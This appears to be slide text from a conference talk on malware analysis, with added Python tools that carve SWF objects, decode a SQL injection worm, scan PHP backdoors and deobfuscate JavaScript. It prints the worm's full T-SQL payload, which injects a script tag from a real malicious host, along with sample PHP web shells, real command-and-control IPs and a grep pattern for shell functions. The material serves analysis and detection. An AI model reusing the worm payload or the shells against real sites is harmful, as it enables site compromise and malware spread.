Advanced Malware Analysis
“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”
www.cdicconference.com
Dissecting Malware with Advanced Techniques
Prathan Phongthiproek (lecturer), SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F
Section Manager, Senior Information Security Consultant
ACIS Professional Center
Let's Party Rock
Next Generation of Malware
Malware Analysis
Web Based Malware
Back to the Past
Back to the Future
Lab Challenge
Next Generation of Malware
Old malware fashion:
Executable file
Packer / crypter => FUD (fully undetectable) for just one week!!
Spyware / adware
Rogue security software
Virus / worm
USB autorun
Antivirus Detected
Gotcha !!
VirusTotal
VirusTotal – one week later
Anubis: Analyzing Binary File
Latest malware fashion:
MS Office + Flash Player
PDF Reader
Mobile application
Social network application
Web browser toolbar
Web based malware
Bypassing Antivirus
Ninja Techniques
Malware Analysis
CVE-2012-0754: SWF in DOC
"Iran's Oil and Nuclear Situation.doc" contains an embedded Flash object that instructs Flash Player to download and parse a malformed MP4.
Desktop affected: Adobe Flash Player before 10.3.183.15, and 11.x before 11.1.102.62, on Windows, Mac OS X, Linux and Solaris.
Mobile affected: Adobe Flash Player before 11.1.111.6 on Android 2.x and 3.x, and before 11.1.115.6 on Android 4.x.
Document Analysis
Decompiled Flash from the file: This.MyNS.play("http://208.115.230.76/test.mp4");
Whois – 208.115.230.76
Reverse DNS: 76-230-115-208.static.reverse.lstn.net
Host reachable, 77 ms average, 2 of 4 pings lost
Net range: 208.115.192.0 - 208.115.255.255
Limestone Networks, Inc., 400 S. Akard Street, Suite 200, Dallas, TX 75202, United States
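The Document Analysis step above recovers the payload URL by decompiling the Flash object. The following is an added example (not code from the slides) showing a lighter way to get the same indicator: locate SWF headers inside a document, inflate the zlib-compressed ones, and harvest URL string constants, since the ActionScript string literal survives compression. The "document" it runs on is a constructed in-memory fixture with a placeholder URL (malware.example), not the real sample.

```python
"""Carve embedded SWF objects out of a document blob and pull URL strings from them.

Added example for the Document Analysis step; not code from the slides.
The fixture built by build_sample_doc() is constructed here and the URL in
it is a placeholder, not the real sample's address.
"""
import re
import struct
import zlib

# 3-byte signature followed by a version byte (SWF versions 4..32 are the plausible range).
SWF_MAGIC = re.compile(rb"(?:FWS|CWS)[\x04-\x20]")
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def carve_swf(blob: bytes):
    """Return [(offset, kind, body)] for each SWF whose header and length agree.

    kind is 'FWS' (plain) or 'CWS' (zlib after the 8-byte header); LZMA 'ZWS'
    files are not handled.  A signature whose inflated size does not match the
    declared length, or whose stream does not inflate, is a false positive.
    """
    found = []
    for m in SWF_MAGIC.finditer(blob):
        off = m.start()
        if off + 8 > len(blob):
            continue
        kind = blob[off:off + 3].decode("ascii")
        (declared_len,) = struct.unpack_from("<I", blob, off + 4)
        if declared_len < 8:
            continue
        raw = blob[off + 8:]
        if kind == "CWS":
            try:
                # decompressobj stops at end-of-stream and ignores whatever follows the SWF
                body = zlib.decompressobj().decompress(raw)
            except zlib.error:
                continue
        else:
            body = raw[:declared_len - 8]
        if len(body) + 8 != declared_len:
            continue
        found.append((off, kind, body))
    return found


def extract_urls(body: bytes):
    """Unique URL-looking strings in an inflated SWF body, quotes/brackets trimmed."""
    seen = []
    for u in URL_RE.findall(body):
        s = u.decode("ascii").rstrip('")\';,')
        if s not in seen:
            seen.append(s)
    return seen


def analyse_document(blob: bytes) -> dict:
    """Map the offset of every carved SWF to the URLs it references."""
    return {off: extract_urls(body) for off, _kind, body in carve_swf(blob)}


def build_sample_doc() -> bytes:
    """Constructed fixture: OLE2 magic, filler, one zlib-compressed SWF whose body
    holds an ActionScript-style string constant with a placeholder URL."""
    as_body = (b"\x00" * 16
               + b'This.MyNS.play("http://malware.example/test.mp4")'
               + b"\x00" * 16)
    header = b"CWS" + bytes([10]) + struct.pack("<I", len(as_body) + 8)
    swf = header + zlib.compress(as_body)
    ole_magic = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
    return ole_magic + b"\x00" * 120 + swf + b"\x00" * 40


if __name__ == "__main__":
    for off, urls in analyse_document(build_sample_doc()).items():
        print(f"SWF at offset {off}: {urls}")
```

On a real sample the body returned by carve_swf is what you would feed to a decompiler; the URL pass alone is enough to pivot to whois and traffic analysis, as the next slides do.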
Process Monitor network log
Traffic and C&C (us.exe)
Virus Analysis – us.exe
Target Analysis
Whois – 199.192.156.134
Host reachable, 89 ms average
Net range: 199.192.152.0 - 199.192.159.255
VPS21 LTD, 38958 S FREMONT BLVD, FREMONT, CA 94536, United States
Contact: zou, jinhe, +1-408-205-7550
Web Based Malware
Back to the Past
Web Defacement
Zone-H
DDoS Tool
Hack 4 Fun and Profit
Back to the Future
About My Memory
2008: the Oishi website was hacked without defacement; Kaspersky AV alerted on "a little JavaScript file"
2009: SQL injection worms on MSSQL affected many banks in Thailand
2010: Google and Firefox alerts for malware websites; obfuscated JS used to bypass AV
2011: many websites blocked by Google's malware warnings
SQL Injection Worms
Injected parameter value as it arrives in the query string (URL-encoded). On the wire the CAST() argument is a 0x hex literal of the UTF-16LE text; the slide shows it already decoded:
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
  DECLARE @T varchar(255),@C varchar(255)
  DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
      and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.fengnima.cn/k.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
AS%20NVARCHAR(4000));EXEC(@S);--
What it does: walks every user table (xtype='u') and every text, ntext, nvarchar and varchar column (xtype 35, 99, 231, 167) and appends a <script src=http://www.fengnima.cn/k.js> tag to each value, so every page that renders database content serves the malicious JS.
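The worm above hides its T-SQL as a hex literal so that signatures looking for "update", "CURSOR" or "<script" in the query string never see them. The following is an added example (not code from the slides) that pulls the CAST(0x...) literal out of a URL-encoded request line, decodes the UTF-16LE text, and reports the injected script source and a verdict. The request lines at the bottom are constructed fixtures; the hostname in them (malware.example) is a placeholder, and encode_payload() exists only to build those fixtures.

```python
"""Decode and flag the CAST(0x... AS NVARCHAR) SQL-injection worm pattern.

Added example, not code from the slides.  The request fixtures are
constructed here and use a placeholder hostname.
"""
import binascii
import re
from urllib.parse import unquote

CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=([^>\s]+)", re.IGNORECASE)


def decode_hex_utf16le(hexdigits: str) -> str:
    """Turn the 0x literal (UTF-16LE: one 00 byte after each ASCII char) back into text."""
    raw = binascii.unhexlify(hexdigits)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")  # odd-length / plain VARCHAR(0x...) variants


def extract_payloads(request_line: str):
    """All decoded CAST(0x...) payloads in one URL-encoded request line."""
    return [decode_hex_utf16le(h) for h in CAST_HEX.findall(unquote(request_line))]


def analyse(request_line: str) -> dict:
    """Decoded SQL, injected <script src> URLs, matched indicators and a worm verdict."""
    payloads = extract_payloads(request_line)
    sql = "\n".join(payloads)
    indicators = [kw for kw in ("sysobjects", "syscolumns", "CURSOR", "update", "<script")
                  if kw.lower() in sql.lower()]
    return {
        "worm": bool(payloads) and len(indicators) >= 3,  # a hex literal alone is not evidence
        "script_src": SCRIPT_SRC.findall(sql),
        "indicators": indicators,
        "sql": sql,
    }


def encode_payload(sql: str) -> str:
    """Wire form of the injection (used here only to construct fixtures)."""
    hx = binascii.hexlify(sql.encode("utf-16-le")).decode()
    return ("';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + hx
            + "%20AS%20NVARCHAR(4000));EXEC(@S);--")


# Constructed fixture modelled on the worm: append a <script> tag to every
# text column of every user table.  The hostname is a placeholder.
WORM_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=http://malware.example/k.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_REQUESTS = [
    "GET /news.asp?id=1" + encode_payload(WORM_SQL) + " HTTP/1.1",   # the worm
    "GET /news.asp?id=1 HTTP/1.1",                                     # benign
    "GET /news.asp?id=CAST(0x3100%20AS%20NVARCHAR(10)) HTTP/1.1",    # hex literal, harmless
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        r = analyse(line)
        print(r["worm"], r["script_src"], r["indicators"])
```

Run it over a web server access log: the third fixture shows why the verdict needs decoded-content indicators rather than the mere presence of CAST(0x...), which legitimate applications do use.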
Web Application Backdoor
Web Application Backdoor - FUD
Redbull.php (PHP Backdoor)
Insert Malicious JS into config.inc.php
Crimepack Exploit Kit
Crimeware Exploit Kit
Drive-By Download
Actors: victim browser, compromised web server, malware server, attacker.
1. Victim visits the malicious (compromised) website on the web server.
2. Malicious JS executes in the browser.
3. Browser is redirected to the malware server.
4. Malware server exploits the browser / Flash Player.
5. Reverse shell back to the attacker.
Google Malware Alert
Google Diagnostic
http://www.stopbadware.org/home/reviewinfo
http://sitecheck.sucuri.net/scanner
http://sucuri.net/malware/malware-entry-mwhta7
http://www.urlvoid.com
Detect Webserver Backdoor
Manual source review
NeoPI – Neohapsis
PHP Shell Scanner
http://25yearsofprogramming.com/php/findmaliciouscode.htm
grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/
(-P needs a grep built with PCRE support. The unquoted --include=*.{php,txt,asp} relies on bash/zsh brace expansion; under a plain POSIX sh it is passed through literally and matches no files. The search only finds literal calls to those functions, which is exactly what the next two slides get around.)
PHP Shell Scanner
Undetectable #1
Undetectable #2
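The grep on the Detect Webserver Backdoor slide only matches literal calls such as system( or base64_decode(; a shell that assembles the function name at run time contains none of those tokens, which is the point of the two "Undetectable" slides. The following is an added example (not the slides' code, and not NeoPI itself, though the longest-string and entropy measures are the ones NeoPI ranks on) that runs three independent heuristics over each file so that an evasion has to beat all of them: the slide's signature list, NeoPI-style long/high-entropy literals, and dynamic-call patterns. The four PHP files are constructed fixtures with illustrative names.

```python
"""Triage PHP files for backdoors: the slide's grep signature beside two heuristics it lacks.

Added example; not code from the slides and not NeoPI.  FILES is a constructed
fixture set; the names are illustrative only.
"""
import base64
import math
import re

# The function list from the slide's grep, as one regex on literal calls.
SIGNATURE = re.compile(
    r"\b(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile)\s*\("
)
# Patterns that survive renaming of the dangerous call.
DYNAMIC_CALLS = {
    "variable_function": re.compile(r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),  # $f($_GET['c'])
    "eval_or_assert": re.compile(r"\b(?:eval|assert)\s*\("),
    "preg_replace_e": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]"),   # /e modifier is eval
    "chr_chain": re.compile(r"(?:chr\s*\(\s*\d+\s*\)\s*\.\s*){3,}"),            # chr(115).chr(121)...
    "name_concat": re.compile(r"['\"][a-z_]{2,}['\"]\s*\.\s*['\"][a-z_]{2,}['\"]\s*;"),  # 'sys'.'tem';
}
STRING_LITERAL = re.compile(r"(['\"])(.*?)\1", re.S)


def shannon_entropy(text: str) -> float:
    """Bits per character: base64/zlib blobs sit near 6, ordinary PHP near 4.5."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(source: str) -> dict:
    """Score one PHP source; 'suspicious' is the OR of the three heuristics."""
    literals = [m.group(2) for m in STRING_LITERAL.finditer(source)]
    longest = max(literals, key=len, default="")
    sig_hits = sorted(set(SIGNATURE.findall(source)))
    dynamic = [name for name, rx in DYNAMIC_CALLS.items() if rx.search(source)]
    blob = len(longest) > 200 and shannon_entropy(longest) > 5.0  # NeoPI-style: long, dense literal
    return {
        "signature": sig_hits,
        "dynamic": dynamic,
        "longest_string": len(longest),
        "entropy": round(shannon_entropy(source), 2),
        "suspicious": bool(sig_hits or dynamic or blob),
    }


def scan_all(files: dict) -> dict:
    """Scan {filename: source}; results ordered most suspicious first."""
    results = {name: scan(src) for name, src in files.items()}
    return dict(sorted(
        results.items(),
        key=lambda kv: (kv[1]["suspicious"], len(kv[1]["dynamic"]), len(kv[1]["signature"])),
        reverse=True))


# Constructed fixtures.  logo.php is the 'undetectable' case: no dangerous token in clear.
_EVAL_BODY = base64.b64encode(b"if(isset($_POST['c'])){passthru($_POST['c']);}").decode()
FILES = {
    "config.inc.php": "<?php\n$db_host = 'localhost';\n$db_user = 'app';\n$db_pass = 's3cret';\n",
    "shell.php": "<?php\nif (isset($_GET['cmd'])) { echo '<pre>'; system($_GET['cmd']); echo '</pre>'; }\n",
    "logo.php": "<?php\n$f = 'sys' . 'tem';\n$f($_GET['c']);\n",
    "cache.php": "<?php\neval(base64_decode('" + _EVAL_BODY + "'));\n",
}

if __name__ == "__main__":
    for name, r in scan_all(FILES).items():
        print(f"{name:16} suspicious={r['suspicious']} signature={r['signature']} dynamic={r['dynamic']}")
```

logo.php produces no signature hit at all and is caught only by the dynamic-call patterns; on a real web root, feed the files in with a directory walk and review the top of the ranking by hand, as the Manual source review item says.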
JS De-Obfuscate Tool
Google Chrome Developer Tools
Firebug (Firefox plugin)
JSDebug (Firefox plugin)
JavaScript Deobfuscator (Firefox plugin)
Malzilla
Rhino
SpiderMonkey
Simple JS Obfuscate
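The tools listed for JS de-obfuscation are interactive. The following is an added example (not code from the slides and not one of those tools) of a static pass for the "Simple JS Obfuscate" case: it rewrites unescape("%XX...") and String.fromCharCode(...) back into string literals until nothing changes, then reports what reaches eval() or document.write() and which URLs appear after decoding, without ever executing the script. The snippet at the bottom is a constructed fixture with a placeholder host (malware.example).

```python
"""Static unpacking of the simplest JS obfuscation layers: unescape() and String.fromCharCode().

Added example; not code from the slides.  SAMPLE is a constructed fixture with
a placeholder host.  Only %XX / %uXXXX escapes and fromCharCode sequences are
handled; packers and runtime-computed keys need an interpreter (Rhino,
SpiderMonkey) instead.
"""
import re

UNESCAPE = re.compile(r"""unescape\(\s*(['"])([^'"]*)\1\s*\)""")
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
SINK = re.compile(r"(?<![\w.])(eval|document\.write|setTimeout|Function)\(")
URL = re.compile(r"""https?://[^\s"'<>]+""")


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %XX -> one char, %uXXXX -> one UTF-16 code unit."""
    return PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_literal(s: str) -> str:
    """Re-emit a decoded string as a single-quoted JS literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n") + "'"


def deobfuscate(js: str, max_rounds: int = 10) -> str:
    """Replace unescape('...') and String.fromCharCode(...) with their values until a
    fixed point, so nested layers are peeled one round at a time."""
    for _ in range(max_rounds):
        new = UNESCAPE.sub(lambda m: js_literal(js_unescape(m.group(2))), js)
        new = FROMCHARCODE.sub(
            lambda m: js_literal("".join(chr(int(n)) for n in m.group(1).split(","))), new)
        if new == js:
            break
        js = new
    return js


def find_sinks(js: str):
    """(sink name, argument text) for every eval/document.write/... call, parentheses balanced."""
    hits = []
    for m in SINK.finditer(js):
        start, depth, i = m.end(), 1, m.end()
        while i < len(js) and depth:
            depth += {"(": 1, ")": -1}.get(js[i], 0)
            i += 1
        hits.append((m.group(1), js[start:i - 1]))
    return hits


def triage(js: str) -> dict:
    """Decoded script, the sinks it feeds, and the URLs visible after decoding."""
    decoded = deobfuscate(js)
    urls = []
    for u in URL.findall(decoded):
        if u not in urls:
            urls.append(u)
    return {"decoded": decoded, "sinks": find_sinks(decoded), "urls": urls}


# Constructed fixture: a hidden iframe built with unescape() and written through
# eval(fromCharCode(...)), so neither 'iframe' nor 'document.write' appears in clear.
SAMPLE = (
    'var s = unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fmalware.example%2F%22'
    '%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E");\n'
    "eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,115,41));\n"
)

if __name__ == "__main__":
    r = triage(SAMPLE)
    print(r["decoded"])
    print("sinks:", r["sinks"])
    print("urls:", r["urls"])
```

The decoded output makes the hidden iframe and its host visible, which is what you need for the Google/Sucuri/URLVoid lookups on the preceding slides; anything left undecoded after the fixed point is the layer that needs one of the interpreter-based tools.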
Lab Challenge